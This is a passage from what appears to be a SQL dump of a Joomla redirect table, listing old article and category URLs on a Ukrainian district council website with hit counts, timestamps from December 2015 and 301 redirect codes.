00:00:00',301),(21090,'http://www.malyn-rayrada.org.ua/index.php?id=38:--19122011-&Itemid=73&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-11 03:08:51','0000-00-00 00:00:00',301),(21091,'http://www.malyn-rayrada.org.ua/index.php?catid=30&id=228:-2011-&Itemid=61&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:08:57','0000-00-00 00:00:00',301),(21092,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=320:-2010-2014-&Itemid=66&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:09:00','0000-00-00 00:00:00',301),(21093,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1073:2013-08-30-11-12-19&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:09:03','0000-00-00 00:00:00',301),(21094,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1070:2013-08-23-04-27-00&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:09:14','0000-00-00 00:00:00',301),(21095,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1205:2014-01-31-07-53-03&Itemid=97&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:09:25','0000-00-00 00:00:00',301),(21096,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1314:2014-05-14-11-53-26&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 03:09:28','0000-00-00 00:00:00',301),(21097,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1132:2013-11-13-10-02-24&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:09:39','0000-00-00 00:00:00',301),(21098,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=581:2012-02-27-13-13-19&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:09:53','0000-00-00 00:00:00',301),(21099,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=605:-l-r-i-iii-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:09:58','0000-00-00 00:00:00',301),(21100,'http://www.malyn-rayrada.org.ua/index.php?id=51:--19072013-&Itemid=92&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',3,0,'2015-12-11 03:10:01','0000-00-00 00:00:00',301),(21101,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1095:2013-09-24-13-25-55&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:10:03','0000-00-00 00:00:00',301),(21102,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:--24--6-&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:10:06','0000-00-00 00:00:00',301),(21103,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=617:-----l---28r-----&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:10:09','0000-00-00 00:00:00',301),(21104,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1291:2014-04-23-11-37-34&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:10:13','0000-00-00 00:00:00',301),(21105,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=614:2012-03-26-16-06-35&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:10:18','0000-00-00 00:00:00',301),(21106,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1126:2013-10-31-12-52-35&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:10:21','0000-00-00 00:00:00',301),(21107,'http://www.malyn-rayrada.org.ua/index.php?catid=32:2011-03-31-12-03-04&id=642:2012-04-03-12-53-05&Itemid=64&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:10:38','0000-00-00 00:00:00',301),(21108,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1220:2014-02-21-15-56-19&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:10:44','0000-00-00 00:00:00',301),(21109,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=998:1&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:10:49','0000-00-00 00:00:00',301),(21110,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=733:-10-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:10:57','0000-00-00 00:00:00',301),(21111,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=832:-9-2012-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:11:02','0000-00-00 00:00:00',301),(21112,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1297:2014-04-24-09-20-07&Itemid=17&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 03:11:08','0000-00-00 00:00:00',301),(21113,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=918:-2013-2015-&Itemid=86&lang=ru&option=com_content&view=article','','','',5,0,'2015-12-11 03:11:14','0000-00-00 00:00:00',301),(21114,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1014:2013-06-03-06-43-44&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 03:11:28','0000-00-00 00:00:00',301),(21115,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1127:2013-11-05-12-58-04&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:11:30','0000-00-00 00:00:00',301),(21116,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=464:2011-11-11-12-15-19&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:11:36','0000-00-00 00:00:00',301),(21117,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=800:-----l--r&Itemid=70&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 03:11:38','0000-00-00 00:00:00',301),(21118,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=689:2012-05-29-17-48-13&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:11:44','0000-00-00 00:00:00',301),(21119,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=815:-16-6-&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:11:46','0000-00-00 00:00:00',301),(21120,'http://www.malyn-rayrada.org.ua/index.php?id=40&Itemid=77&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 03:11:54','0000-00-00 00:00:00',301),(21121,'http://www.malyn-rayrada.org.ua/index.php?id=34&Itemid=68&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-11 03:11:57','0000-00-00 00:00:00',301),(21122,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=777:2012-10-02-10-06-36&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:11:59','0000-00-00 00:00:00',301),(21123,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1325:2014-05-29-06-00-31&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 03:12:28','0000-00-00 00:00:00',301),(21124,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1294:-2012-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:12:33','0000-00-00 00:00:00',301),(21125,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:--24--6-&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:12:36','0000-00-00 00:00:00',301),(21126,'http://www.malyn-rayrada.org.ua/index.php?id=40:--28032012-&Itemid=77&lang=en&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-12-11 03:12:41','0000-00-00 00:00:00',301),(21127,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=724:-27042012252&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:12:44','0000-00-00 00:00:00',301),(21128,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1019:2013-06-06-11-26-38&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:12:51','0000-00-00 00:00:00',301),(21129,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=614:2012-03-26-16-06-35&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:12:54','0000-00-00 00:00:00',301),(21130,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=844:-2013-&Itemid=85&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:12:56','0000-00-00 00:00:00',301),(21131,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=823:2012-11-14-16-52-28&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:12:59','0000-00-00 00:00:00',301),(21132,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=619:-11-6-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:13:02','0000-00-00 00:00:00',301),(21133,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1089:--------l---r---&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:13:04','0000-00-00 00:00:00',301),(21134,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=875:-2013-&Itemid=86&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:13:10','0000-00-00 00:00:00',301),(21135,'http://www.malyn-rayrada.org.ua/index.php?catid=7:2010-06-05-12-53-35&id=9:2010-06-05-15-10-04&Itemid=12&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:13:44','0000-00-00 00:00:00',301),(21136,'http://www.malyn-rayrada.org.ua/index.php?catid=32:2011-03-31-12-03-04&id=641:2012-04-03-12-52-00&Itemid=64&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:13:46','0000-00-00 00:00:00',301),(21137,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=669:-2011-56-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:14:10','0000-00-00 00:00:00',301),(21138,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=583:-l-lr&Itemid=77&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:14:15','0000-00-00 00:00:00',301),(21139,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=712:2012-06-14-15-11-24&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:14:17','0000-00-00 00:00:00',301),(21140,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=505:2011-12-16-13-24-32&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:14:19','0000-00-00 00:00:00',301),(21141,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1201:2014-01-31-07-43-11&Itemid=97&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:14:57','0000-00-00 00:00:00',301),(21142,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=597:-l-r-2011-&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:14:59','0000-00-00 00:00:00',301),(21143,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1008:2013-05-20-07-02-57&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:15:04','0000-00-00 00:00:00',301),(21144,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=861:-qq&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:15:09','0000-00-00 00:00:00',301),(21145,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1334:2014-06-06-05-54-20&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:15:21','0000-00-00 00:00:00',301),(21146,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=949:2013-03-06-12-51-36&Itemid=88&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:15:23','0000-00-00 00:00:00',301),(21147,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=713:2012-06-14-15-13-57&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:15:30','0000-00-00 00:00:00',301),(21148,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1146:2013-11-27-10-09-00&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:15:35','0000-00-00 00:00:00',301),(21149,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=863:-qq&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:15:37','0000-00-00 00:00:00',301),(21150,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=205:--------2011--&Itemid=60&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:15:39','0000-00-00 00:00:00',301),(21151,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1084:-qq&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:15:48','0000-00-00 00:00:00',301),(21152,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1187:2014-01-28-09-43-51&Itemid=97&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:15:53','0000-00-00 00:00:00',301),(21153,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=808:2012-10-30-13-56-37&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:15:57','0000-00-00 00:00:00',301),(21154,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=995:-2012-&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:15:59','0000-00-00 00:00:00',301),(21155,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=780:2012-10-04-07-48-30&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:16:02','0000-00-00 00:00:00',301),(21156,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=544:2012-01-26-12-03-44&Itemid=76&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:16:04','0000-00-00 00:00:00',301),(21157,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=985:2013-04-12-09-53-08&Itemid=88&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:16:06','0000-00-00 00:00:00',301),(21158,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=832:-9-2012-&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:16:10','0000-00-00 00:00:00',301),(21159,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=712:2012-06-14-15-11-24&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:16:25','0000-00-00 00:00:00',301),(21160,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1097:2013-09-25-08-35-50&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:16:33','0000-00-00 00:00:00',301),(21161,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1082:-2012-2015-&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:16:37','0000-00-00 00:00:00',301),(21162,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=218:2010-12-21-06-45-54&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:16:51','0000-00-00 00:00:00',301),(21163,'http://www.malyn-rayrada.org.ua/index.php?id=42:--16052012-&Itemid=80&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 03:16:57','0000-00-00 00:00:00',301),(21164,'http://www.malyn-rayrada.org.ua/index.php?id=37&Itemid=72&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',4,0,'2015-12-11 03:17:01','0000-00-00 00:00:00',301),(21165,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:-24-6-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:04','0000-00-00 00:00:00',301),(21166,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1132:2013-11-13-10-02-24&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:07','0000-00-00 00:00:00',301),(21167,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=863:-qq&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:10','0000-00-00 00:00:00',301),(21168,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=412:------165------&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:17','0000-00-00 00:00:00',301),(21169,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1099:------------------l-r&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:21','0000-00-00 00:00:00',301),(21170,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=438:-----------l--r&Itemid=72&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:31','0000-00-00 00:00:00',301),(21171,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=717:2012-06-14-15-22-29&Itemid=82&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:17:34','0000-00-00 00:00:00',301),(21172,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=704:-20-2011-108-l-r-&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:37','0000-00-00 00:00:00',301),(21173,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&Itemid=94&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:39','0000-00-00 00:00:00',301),(21174,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1085:2013-09-11-12-15-54&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:41','0000-00-00 00:00:00',301),(21175,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=997:-27-&Itemid=0&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 03:17:46','0000-00-00 00:00:00',301),(21176,'http://www.malyn-rayrada.org.ua/index.php?id=39&Itemid=76&lang=en&layout=blog&limitstart=20&option=com_content&view=category','','','',2,0,'2015-12-11 03:17:48','0000-00-00 00:00:00',301),(21177,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=542:-2011-&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:50','0000-00-00 00:00:00',301),(21178,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=747:2012-08-03-09-21-28&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:52','0000-00-00 00:00:00',301),(21179,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=614:2012-03-26-16-06-35&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:57','0000-00-00 00:00:00',301),(21180,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=804:2012-10-28-18-37-40&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:17:59','0000-00-00 00:00:00',301),(21181,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1109:2013-10-18-10-25-30&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:18:06','0000-00-00 00:00:00',301),(21182,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1060:2013-07-27-10-13-15&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:18:08','0000-00-00 00:00:00',301),(21183,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1164:2013-12-29-11-46-36&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:18:10','0000-00-00 00:00:00',301),(21184,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=843:-l-r&Itemid=85&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:18:19','0000-00-00 00:00:00',301),(21185,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=933:-2013-2017-&Itemid=86&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:18:24','0000-00-00 00:00:00',301),(21186,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=949:2013-03-06-12-51-36&Itemid=88&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:18:35','0000-00-00 00:00:00',301),(21187,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1312:2014-05-08-08-59-19&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 03:18:37','0000-00-00 00:00:00',301),(21188,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=733:-10-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:18:39','0000-00-00 00:00:00',301),(21189,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1113:2013-10-23-09-26-07&Itemid=94&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:18:51','0000-00-00 00:00:00',301),(21190,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=750:2012-09-01-09-40-02&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:18:53','0000-00-00 00:00:00',301),(21191,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1131:9-------&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:19:12','0000-00-00 00:00:00',301),(21192,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=665:-75-&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:19:17','0000-00-00 00:00:00',301),(21193,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=948:-2012-&Itemid=88&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:19:19','0000-00-00 00:00:00',301),(21194,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=550:2012-01-26-12-39-51&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:19:21','0000-00-00 00:00:00',301),(21195,'http://www.malyn-rayrada.org.ua/index.php?catid=27:---1932-33-&id=142:2010-10-15-06-19-49&Itemid=58&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:19:23','0000-00-00 00:00:00',301),(21196,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=614:2012-03-26-16-06-35&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:19:32','0000-00-00 00:00:00',301),(21197,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=330:2011-05-20-16-28-08&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:19:35','0000-00-00 00:00:00',301),(21198,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1290:2014-04-23-06-56-41&Itemid=17&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:19:38','0000-00-00 00:00:00',301),(21199,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=844:-2013-&Itemid=85&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:19:41','0000-00-00 00:00:00',301),(21200,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1090:-l-r-&Itemid=70&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:19:45','0000-00-00 00:00:00',301),(21201,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=696:-14-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:19:47','0000-00-00 00:00:00',301),(21202,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=698:-6-16112010-5-&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:19:50','0000-00-00 00:00:00',301),(21203,'http://www.malyn-rayrada.org.ua/index.php?catid=31:-25032011&id=274:2011-03-28-08-22-32&Itemid=62&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:19:56','0000-00-00 00:00:00',301),(21204,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1165:-2014-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:20:01','0000-00-00 00:00:00',301),(21205,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=670:2012-05-08-05-15-51&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:20:03','0000-00-00 00:00:00',301),(21206,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1308:2014-05-05-05-20-51&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 03:20:05','0000-00-00 00:00:00',301),(21207,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=984:-20-&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:20:10','0000-00-00 00:00:00',301),(21208,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=846:2012-12-10-14-06-00&Itemid=85&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:20:14','0000-00-00 00:00:00',301),(21209,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=634:-2016-&Itemid=80&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:20:21','0000-00-00 00:00:00',301),(21210,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=315:2011-05-20-13-07-47&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:20:25','0000-00-00 00:00:00',301),(21211,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=930:2013-02-21-09-13-00&Itemid=86&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:20:29','0000-00-00 00:00:00',301),(21212,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1073:2013-08-30-11-12-19&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:20:34','0000-00-00 00:00:00',301),(21213,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=982:2013-04-03-11-58-18&Itemid=88&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 03:20:36','0000-00-00 00:00:00',301),(21214,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=565:2012-02-03-09-48-29&Itemid=76&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:20:38','0000-00-00 00:00:00',301),(21215,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=784:-9-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:20:45','0000-00-00 00:00:00',301),(21216,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1001:2013-04-30-12-14-17&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:20:50','0000-00-00 00:00:00',301),(21217,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=631:-i-2012-&Itemid=80&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:20:52','0000-00-00 00:00:00',301),(21218,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1200:2014-01-31-07-40-52&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:20:54','0000-00-00 00:00:00',301),(21219,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=669:-2011-56-&Itemid=&lang=ru&option=com_content&view=article','','','',5,0,'2015-12-11 03:20:56','0000-00-00 00:00:00',301),(21220,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=594:-lr-&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:21:01','0000-00-00 00:00:00',301),(21221,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1112:2013-10-23-09-24-43&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:21:03','0000-00-00 00:00:00',301),(21222,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1064:2013-08-09-07-52-21&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:21:10','0000-00-00 00:00:00',301),(21223,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=644:2012-04-04-09-52-48&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:21:15','0000-00-00 00:00:00',301),(21224,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=888:-2012-&Itemid=85&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:21:17','0000-00-00 00:00:00',301),(21225,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=468:-15-2011-120-l-r&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:21:19','0000-00-00 00:00:00',301),(21226,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=779:2012-10-03-12-34-44&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:21:24','0000-00-00 00:00:00',301),(21227,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1011:2013-05-29-09-51-28&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:21:26','0000-00-00 00:00:00',301),(21228,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1218:2014-02-21-15-02-18&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:21:32','0000-00-00 